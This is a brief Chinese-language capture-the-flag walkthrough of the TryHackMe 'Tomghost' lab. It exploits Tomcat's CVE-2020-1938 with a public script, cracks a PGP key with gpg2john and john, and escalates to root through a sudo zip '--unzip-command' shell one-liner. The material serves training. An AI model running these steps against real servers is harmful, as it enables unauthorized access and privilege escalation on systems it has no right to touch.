!!!

 

Tomghost

Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.

bilibili

https://www.bilibili.com/video/BV13G4y1B7WT

信息搜索

扫下端口

Snipaste_2022-09-17_22-47-16

扫描目录,不过没什么收获

我们搜下tomcat 9.0.30

找到漏洞

CVE-2020-1938

CVE-2020-1938

 

  • Apache Tomcat 9.x < 9.0.31
  • Apache Tomcat 8.x < 8.5.51
  • Apache Tomcat 7.x < 7.0.100
  • Apache Tomcat 6.x

exphub/tomcat at master · zhzyker/exphub (github.com)

python2 ./p.py 10.10.106.85

 

直接利用

Snipaste_2022-09-17_23-51-06

拿到skyfuck权限

我们看到加密文件,尝试解密下

 

convert

 

ASC文件是加密软件PGP(Pretty Good Privacy)

gpg2john ——— .asc

复制tryhackme.asc到kali改名1.asc

gpg2john 1.asc > 1

john –wordlist=rockyou.txt 1

然后得到密钥

Snipaste_2022-09-17_23-54-42

gpg -import tryhackme.asc

gpg - -decrypt credential.pgp

Snipaste_2022-09-17_23-34-20

 

 

sodo -l

Snipaste_2022-09-17_23-47-10

touch 1.txt

sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

Snipaste_2022-09-17_23-47-43

 

linux zip 提权YouthBelief的博客-CSDN博客zip提权

!!!

-------------------完-------------------